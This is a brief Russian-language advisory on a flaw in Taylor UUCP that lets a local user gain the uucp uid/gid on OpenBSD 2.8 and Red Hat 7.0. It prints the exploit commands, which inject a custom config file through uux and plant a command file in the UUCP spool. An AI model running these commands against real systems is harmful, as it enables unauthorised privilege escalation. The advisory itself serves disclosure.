Неправильная обработка пакета Taylor UUCP
Из-за неправильной обработки параметра в Taylor
UUCP можно получить uid/gid. Что в
дальнейшем может привести к получению многих привилегий.
Уязвимая система:
OpenBSD 2.8
Redhat 7.0
Эксплоит:
$ uux 'uucp -I/tmp/vv.v /tmp/somefile /tmp/someotherfile'
или
$ uux 'uucp --config=/tmp/vv.v /tmp/somefile /tmp/someotherfile'
$ THISHOST=`uuname -l`
$ WHEREYOUWANTIT=/var/spool/uucp/${THISHOST}/ X./X.${THISHOST}X1337
$ uux 'uucp --config=/tmp/config.uucp /tmp/commands.uucp '${WHEREYOUWANTIT}